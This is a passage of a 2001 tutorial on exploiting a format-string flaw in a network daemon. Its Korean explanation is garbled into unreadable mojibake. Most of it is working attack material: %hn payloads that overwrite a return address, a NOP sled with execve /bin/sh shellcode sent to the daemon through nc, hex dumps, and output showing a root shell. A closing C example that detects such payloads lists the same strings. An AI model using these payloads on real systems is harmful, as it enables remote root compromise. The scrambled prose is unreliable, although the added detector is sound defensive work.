0xbffff9d4 14 fa ff bf 1c fa ff bf ........ [x82@testsub x82]$ format string ̿ 䱸ϸ, α׷ Stack ״ Ѵ. ⼭ AAAA ־ְ %x 䱸 Stack pushǴ ּҰ, Է µǴ ּҰ 󸶰 ϴ° ϴ Ѵ. %x 16 Ҷ ȴ. 16 ̷ Stack ϱ ؼε, %%x ù°  % Ȯ (printf "") ɳο format string νĽŰ ϱ ̴. α׷ غ̶ ⺻ ˰Ŷ Ѵ. "AAAA4141414178257825782578254001000a" Stack push Ǵ ּҰ µǴ ּҰ ʴ´. ̴ ϱ ſ ȯ̶ Ҽִ. Ѵٸ, %x ´ 4byte(0x 41 41 41 41) äν, ̰ Ȯ ġ ִ°̴. ׷ٸ ǽ . 츮 ׸ Ưּҿ  ִٸ, ̸ ų ̴. ƯּҴ code ־ format string պκп ְԵȴ. ּҴ %n Ƽ긦 ̿ Stack push ɰ̴. %n Ƽ պκп 츮 jump ؾ ּ(16 buffer ּҰ) 10 ȯϿ ˹ڿ ȴ. (⺻ "%1000d" ̷ ȯ ̶ ϸ ȴ. տ  1000̶ 16 10 ̴.) Ͽ exploit õغ. 0x0400000b. exploit տ jump ؾּҸ 10· Ͽ ° Ҽִ. 0xbfffef34 10 Ҽ ִ. 0x b : 16 x 16 x 16 x 16 x 16 x 16 x 16 x b(11) f : 16 x 16 x 16 x 16 x 16 x 16 x f(15) f : 16 x 16 x 16 x 16 x 16 x f(15) f : 16 x 16 x 16 x 16 x f(15) e : 16 x 16 x 16 x e(14) f : 16 x 16 x f(15) 3 : 16 x 3 4 : + 4 , 10 ũ 굵 ʴ. ׷Ƿ 2 Ѵ. (bfff/ef34) 굵 Ȯ ֱ κ format string ݽÿ äѴ. 1 + bfff : 114687 ef34 : 61236 1bfff - ef34 : 53451 bfff : 53451 ̷ 2 Ͽ 53451(bfff) 61236(ef34)  ־. ̷Ա 10  ? ϴ. ι ľ ̹Ƿ Ÿ ִ. "%61236d %hn %53451d %hn" (ef34)(push)(bfff)(push) %n 4byte , %hn 2byte Ѵ. ׷Ƿ ι Overwrite ų ִ°̴. %hn Ƽ %n Ƽ긦 ־ . , ϴ ּҿ . ǰ Ͽ.  ϴ ּ: 0xbffff894  ּ : 0xbfffef34 ׷, ! [x82@testsub x82]$ (printf "\x82\x82\x82\x82\x94\xf8\xff\xbf\x82\x82\x82\x82 \x96\xf8\xff\xbf%%61220d%%hn%%53451d%%hn";cat) | nc xxx.xx.xx.xx 60177 ... sleep ... ... sleep ... ... sleep ... -2105376126 0xbffff7d4 82 82 82 82 94 f8 ff bf 82 82 82 82 96 f8 ff bf ................ 0xbffff7e4 25 36 31 32 32 30 64 25 68 6e 25 35 33 34 35 31 %61220d%hn%53451 0xbffff7f4 64 25 68 6e 0a 00 01 40 bc 21 01 40 94 21 01 40 d%hn...@.!.@.!.@ 0xbffff804 9c 21 01 40 a4 21 01 40 00 00 00 00 00 00 00 00 .!.@.!.@........ 0xbffff814 00 00 00 00 ac 21 01 40 b4 21 01 40 00 00 00 00 .....!.@.!.@.... 0xbffff824 00 00 00 00 8c 21 01 40 d8 a4 02 40 00 f9 ff bf .....!.@...@.... 
0xbffff834 86 79 00 40 ac a4 02 40 ac a4 02 40 24 20 01 40 .y.@...@...@$ .@ 0xbffff844 a8 2b 01 40 0d 43 00 00 24 20 01 40 a8 2b 01 40 .+.@.C..$ .@.+.@ 0xbffff854 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0xbffff864 00 00 00 00 00 00 00 00 b0 3a 00 00 00 00 00 00 .........:...... 0xbffff874 00 00 00 00 00 00 00 00 00 00 00 00 24 f7 01 40 ............$..@ 0xbffff884 ab 03 00 00 64 2a 02 40 74 bc 01 40 a8 2b 01 40 ....d*.@t..@.+.@ 0xbffff894 34 ef ff bf 68 f9 ff bf 86 79 00 40 ac a4 02 40 4...h....y.@...@ ~~~~~~~~~~~ (0xbfffef34) 0xbffff8a4 88 82 04 08 24 20 01 40 b0 26 01 40 6e 00 00 00 ....$ .@.&.@n... 0xbffff8b4 ac a4 02 40 24 20 01 40 a8 2b 01 40 5b 41 00 00 ...@$ .@.+.@[A.. 0xbffff8c4 a8 2b 01 40 a5 59 00 00 86 79 00 40 ac a4 02 40 .+.@.Y...y.@...@ 0xbffff8d4 98 2a 02 40 24 20 01 40 b0 26 01 40 14 82 04 08 .*.@$ .@.&.@.... 0xbffff8e4 f0 38 00 00 f4 26 02 40 a8 06 00 00 64 2a 02 40 .8...&.@....d*.@ 0xbffff8f4 74 bc 01 40 a8 2b 01 40 03 00 00 00 18 2e 01 40 t..@.+.@.......@ 0xbffff904 01 00 00 00 20 f9 ff bf f4 81 04 08 b4 28 01 40 .... ........(.@ 0xbffff914 0f 53 8e 07 9c f9 ff bf 72 82 04 08 f4 26 02 40 .S......r....&.@ 0xbffff924 a8 2b 01 40 ac f9 ff bf bf 6b 02 40 64 f5 01 40 .+.@.....k.@d..@ 0xbffff934 a8 2b 01 40 f4 0c 02 40 a8 2b 01 40 b4 28 01 40 .+.@...@.+.@.(.@ 0xbffff944 8e ff 77 01 cc f9 ff bf 60 82 04 08 f4 1f 02 40 ..w.....`......@ 0xbffff954 a8 2b 01 40 77 ff ff bf bf f9 ff bf 20 00 00 00 .+.@w....... ... 0xbffff964 ec 7b 10 40 a0 f9 ff bf 9d 9f 00 40 c7 03 01 40 .{.@.......@...@ 0xbffff974 48 2e 01 40 07 00 00 00 ee 9e 00 40 1c 97 04 08 H..@.......@.... 0xbffff984 00 a6 00 40 14 fa ff bf b0 26 01 40 f4 81 04 08 ...@.....&.@.... 0xbffff994 28 97 04 08 72 82 04 08 f4 26 02 40 c8 f9 ff bf (...r....&.@.... 0xbffff9a4 10 a1 00 40 4b 80 0f 40 1c 97 04 08 00 a6 00 40 ...@K..@.......@ 0xbffff9b4 14 fa ff bf c8 f9 ff bf 4b 84 04 08 08 97 04 08 ........K....... 
0xbffff9c4 1c 97 04 08 e8 f9 ff bf fb 11 03 40 01 00 00 00 ...........@.... 0xbffff9d4 14 fa ff bf 1c fa ff bf ........ [x82@testsub x82]$ Success! ǰ Ͽ. format string мغڴ. "\x82\x82\x82\x82\x94\xf8\xff\xbf" /* 8byte */ 0xbffff894 ּҿ "ef34" Overwrite Ѵ. Stack ϶ "34 ef" push ȴ. "\x82\x82\x82\x82\x96\xf8\xff\xbf" /* 8byte */ 0xbffff896 ּҿ "bfff" Overwrite Ѵ. Stack ϶ "ff bf" push ȴ. "%%61220d%%hn%%53451d%%hn" ̹ "%%61236d%%hn%%53451d%%hn" ٸ? ׷. "%%61236d" "%%61220d" Ȱ ̴. ̴ ƯּҰ, 16byte(8byte+8byte) minus ̴. ̷, ƯּҸ 츮 ϴ Ҽ ־. ׷ٸ, server daemon program return address shellcode ּҰ ϸ  ɰΰ? и daemon shell Ҽ ̴. :-D ǰݰ غ ɼ ִ.  ϴ ּ: 0xbffff894 ---> , Return address.  ּ : 0xbfffef34 ---> 翬 shellcode ִ address. ׷Ƿ ۾ߴ ǰ ſ ϰ Ҽ ִ. , Return address ϴ° dump stack ݹã ִ. α׷ 500byte data input ޴´ٸ, 504byte ebp ϰ̰, 508byte retϰ иϴ. 0xbffff7d4 data buffer ۵ǹǷ, 0xbffff9c4, ebp(4byte) 0xbffff9c8 ~ 0xbffff9cb , ret(4byte) 0xbffff9cc ~ 0xbffff9cf ˼ִ.  ϴ ּ(Return address): 0xbffff9cc  ּ (&shellcode address): 0xbffff804 &shellcode address ڰ stack ּҸ ˸ ˼ִ. ۾ sp ˾Ƴ address ݽ ݴϴ daemon α׷ ִ´. ;-D : unsigned long sp(void) { __asm__("movl %esp,%eax"); } ̷ &shellcode ġ ˾Ƴٰ Ѵ. ( code eggshellcode غ ˼ ̴.) 10 "%%63492d%%hn%%51195d%%hn" code ־. exploit Ǿ. "\x82\x82\x82\x82\xcc\xf9\xff\xbf\x82\x82\x82\x82\xce\xf9\xff\xbf%%63476d%%hn%%51195d%%hn" ̷ format string code ߰Ұ ִ. ٷ, 츮 ʿ ϴ shellcode ̴. shellcode ־ , exploit ϼϿ. õغ ϰڴ. 0x0400000c. stack debugging ݰ! 
:-p [x82@testsub x82]$ (printf "\x82\x82\x82\x82\xcc\xf9\xff\xbf\x82\x82\x82\x82 \xce\xf9\xff\xbf%%63476d%%hn%%51195d%%hn\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1 \x8d\x42\x0b\xcd\x80\x0a";cat) | nc xxx.xx.xx.xx 60177 ... sleep ... ... sleep ... ... sleep ... -2105376126? B?? 0xbffff7d4 82 82 82 82 cc f9 ff bf 82 82 82 82 ce f9 ff bf ................ 0xbffff7e4 25 36 33 34 37 36 64 25 68 6e 25 35 31 31 39 35 %63476d%hn%51195 0xbffff7f4 64 25 68 6e 90 90 90 90 90 90 90 90 90 90 90 90 d%hn............ 0xbffff804 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff814 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff824 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff834 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff844 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff854 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff864 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff874 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff884 90 90 90 90 90 90 90 90 90 90 90 31 d2 52 68 6e ...........1.Rhn 0xbffff894 2f 73 68 68 2f 2f 62 69 89 e3 52 53 89 e1 8d 42 /shh//bi..RS...B 0xbffff8a4 0b cd 80 0a 00 20 01 40 b0 26 01 40 6e 00 00 00 ..... .@.&.@n... 
0xbffff8b4 ac a4 02 40 24 20 01 40 a8 2b 01 40 5b 41 00 00 ...@$ .@.+.@[A.. 0xbffff8c4 a8 2b 01 40 a5 59 00 00 86 79 00 40 ac a4 02 40 .+.@.Y...y.@...@ 0xbffff8d4 98 2a 02 40 24 20 01 40 b0 26 01 40 14 82 04 08 .*.@$ .@.&.@.... 0xbffff8e4 f0 38 00 00 f4 26 02 40 a8 06 00 00 64 2a 02 40 .8...&.@....d*.@ 0xbffff8f4 74 bc 01 40 a8 2b 01 40 03 00 00 00 18 2e 01 40 t..@.+.@.......@ 0xbffff904 01 00 00 00 20 f9 ff bf f4 81 04 08 b4 28 01 40 .... ........(.@ 0xbffff914 0f 53 8e 07 9c f9 ff bf 72 82 04 08 f4 26 02 40 .S......r....&.@ 0xbffff924 a8 2b 01 40 ac f9 ff bf bf 6b 02 40 64 f5 01 40 .+.@.....k.@d..@ 0xbffff934 a8 2b 01 40 f4 0c 02 40 a8 2b 01 40 b4 28 01 40 .+.@...@.+.@.(.@ 0xbffff944 8e ff 77 01 cc f9 ff bf 60 82 04 08 f4 1f 02 id uid=0(root) gid=0(root) groups=0(root) exit Success~! ߴ. :-D  ̷ Ǿ gdb Debugging 캸. nc ̿ code debug Էºκ: > 00000000 82 82 82 82 cc f9 ff bf 82 82 82 82 ce f9 ff bf # ................ // "\x82\x82\x82\x82\xcc\xf9\xff\xbf\x82\x82\x82\x82\xce\xf9\xff\xbf" > 00000010 25 36 33 34 37 36 64 25 68 6e 25 35 31 31 39 35 # %63476d%hn%51195 > 00000020 64 25 68 6e 90 90 90 90 90 90 90 90 90 90 90 90 # d%hn............ // "%63476d%hn%51195d%hn" > 00000030 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000050 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 000000a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ 
> 000000b0 90 90 90 90 90 90 90 90 90 90 90 // NOP Է³ 31 d2 52 68 6e # ...........1.Rhn > 000000c0 2f 73 68 68 2f 2f 62 69 89 e3 52 53 89 e1 8d 42 # /shh//bi..RS...B > 000000d0 0b cd 80 // shellcode Է 0a # .... // '\0' Է ڿ ˸ Enter Daemon α׷ κ: < 00000000 82 82 82 82 cc f9 ff bf 82 82 82 82 ce f9 ff bf # ................ < 00000010 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 00000020 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 00000030 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 00000040 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 00000050 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # ... ... < 0000f7d0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0000f7e0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0000f7f0 20 20 20 20 20 20 20 20 20 2d 32 31 30 35 33 37 # -210537 < 0000f800 36 31 32 36 20 20 20 20 20 20 20 20 20 20 20 20 # 6126 < 0000f810 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0000f820 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # ... ... < 0001bfa0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0001bfb0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0001bfc0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0001bfd0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0001bfe0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0001bff0 20 20 20 20 2d 32 31 30 35 33 37 36 31 32 36 90 # -2105376126. < 0001c000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c020 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c030 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c050 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ 
< 0001c070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c090 90 90 90 90 90 90 31 d2 52 68 6e 2f 73 68 68 2f # ......1.Rhn/shh/ < 0001c0a0 2f 62 69 89 e3 52 53 89 e1 8d 42 0b cd 80 0a 00 # /bi..RS...B....0 µǴ "-2105376126" 츮 ι Overwrite µ ̴. 2 ľ Ƿ, ι µǾ. "\x20" 鹮ڿν, 츮 Ͽ push ġ jump ϴ ״ ְ ִ. ڴ NOP shellcode , "x0a" ڿ Է ˸鼭 Ȯ ϰ Ȱ̴. 0x05. ̷ν Remote Overflow & Format String غҴ. code dump غ ϴ ȯ濡 غ ۾ ξ ۾ ľѴ. ۾ ȯ濡 ߻ Ұϱ ̴. ڴ ٸ ȯ õغ ʿ䰡 ִ. ݿ İ KnowHow Ǹ, ߿ ̺ ̵ Ҽ ̴. :-) ڱ . "  ý ̿Ͽ ٴ ΰ ϴ." ׷. remote 󿡼 ̷ , Ƹٿ . ۼ߿ remote attack ϰ, ϴ ̵ ... ݷ ޼ ϰ ʹ. :-) P.S: ߰߰ κ Դϴ. ۵ ϰ --; ̷ Ͽ ô޸ٺ ... ۼ Ȧ ϴ. (, ̰ ΰӴ --;;) Ϸ绡 Ȱ ûϰ ư ڽϴ. ׵ 翡 ְ ϴ ģ鿡 մϴ. ^^ Ӹƴ϶, ̳ Ÿ ֽ е鲲 帳ϴ. ׷, ̸ ... :-D by Xpl017Elz. 2001/11/09.
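The probe and payloads shown in sections 0x03 and 0x04 ("AAAA %x %x %x %x", "%61220d%hn%53451d%hn" once the shell's doubled percent signs are collapsed, and a long run of 0x90 ahead of the shellcode) are also exactly what a defender sees on the wire. The following added example, not from the article or its author, screens a request payload for those traits on the server side: it counts printf-style conversions, counts the memory-writing %n family separately, and measures the longest run of 0x90 bytes. scan_payload, is_suspicious, the thresholds NOP_RUN_THRESHOLD and MAX_BENIGN_CONVERSIONS, the string wrappers and the sample payloads are all my constructions, tuned for a service like the toy daemon whose protocol never legitimately carries a percent sign.

```c
/* Added example (not from the original article): server-side screening of a
 * request payload for the traits the article's probes and payloads show.
 * Thresholds and sample data are constructed for this example. */
#include <stdio.h>
#include <string.h>

#define NOP_RUN_THRESHOLD       32   /* assumed: longest tolerated 0x90 run */
#define MAX_BENIGN_CONVERSIONS   3   /* assumed: protocol never needs '%'  */

typedef struct {
    size_t conversions;     /* printf conversions other than the literal %% */
    size_t n_writes;        /* %n, %hn, %ln ...: conversions that write memory */
    size_t longest_nop_run; /* longest run of consecutive 0x90 bytes */
} payload_stats;

/* strchr() would match the terminating NUL, so exclude it explicitly. */
static int in_set(unsigned char c, const char *set)
{
    return c != '\0' && strchr(set, c) != NULL;
}

static int is_digit_or_star(unsigned char c)
{
    return c == '*' || (c >= '0' && c <= '9');
}

payload_stats scan_payload(const unsigned char *p, size_t len)
{
    payload_stats s = {0, 0, 0};
    size_t run = 0;
    for (size_t i = 0; i < len; i++) {
        if (p[i] == 0x90) {
            if (++run > s.longest_nop_run)
                s.longest_nop_run = run;
        } else {
            run = 0;
        }
        if (p[i] != '%')
            continue;
        size_t j = i + 1;
        if (j < len && p[j] == '%') {      /* "%%" is a literal percent sign */
            i = j;
            continue;
        }
        while (j < len && in_set(p[j], "-+ #0")) j++;        /* flags */
        while (j < len && is_digit_or_star(p[j])) j++;       /* field width */
        if (j < len && p[j] == '.') {                        /* precision */
            j++;
            while (j < len && is_digit_or_star(p[j])) j++;
        }
        while (j < len && in_set(p[j], "hlLqjzt")) j++;      /* length modifier */
        if (j < len && in_set(p[j], "diouxXeEfFgGaAcspn")) {
            s.conversions++;
            if (p[j] == 'n')
                s.n_writes++;
            i = j;                          /* resume after the directive */
        }
    }
    return s;
}

int is_suspicious(const payload_stats *s)
{
    return s->n_writes > 0
        || s->longest_nop_run >= NOP_RUN_THRESHOLD
        || s->conversions > MAX_BENIGN_CONVERSIONS;
}

/* String wrappers so that one check reads as one call. */
size_t conversions_in(const char *s)
{
    return scan_payload((const unsigned char *)s, strlen(s)).conversions;
}
size_t writes_in(const char *s)
{
    return scan_payload((const unsigned char *)s, strlen(s)).n_writes;
}
int suspicious_text(const char *s)
{
    payload_stats st = scan_payload((const unsigned char *)s, strlen(s));
    return is_suspicious(&st);
}

/* Constructed sample: 8 printable bytes, `nops` NOP bytes, 1 printable byte.
 * Returns the longest 0x90 run the scanner measures (expected: nops). */
size_t scan_nop_sample(size_t nops)
{
    unsigned char buf[1024];
    if (nops > sizeof buf - 9)
        nops = sizeof buf - 9;
    memset(buf, 'A', 8);
    memset(buf + 8, 0x90, nops);
    buf[8 + nops] = 'B';
    return scan_payload(buf, 9 + nops).longest_nop_run;
}

int main(void)
{
    /* Constructed requests: the article's benign "id", its %x probe, its
     * two-write %hn payload in wire form, and a harmless literal percent. */
    const char *samples[] = {"id", "AAAA %x %x %x %x",
                             "%61220d%hn%53451d%hn", "progress 100%% done"};
    for (size_t k = 0; k < sizeof samples / sizeof samples[0]; k++)
        printf("%-24s conv=%zu writes=%zu -> %s\n", samples[k],
               conversions_in(samples[k]), writes_in(samples[k]),
               suspicious_text(samples[k]) ? "SUSPICIOUS" : "ok");
    printf("250-byte NOP sled: longest run %zu\n", scan_nop_sample(250));
    return 0;
}
```

A single %n-family directive is enough to flag a request on its own, because nothing a well-formed client sends to this service can contain one; the conversion count and the NOP-run length are softer signals whose thresholds would need tuning for a protocol that legitimately carries binary data.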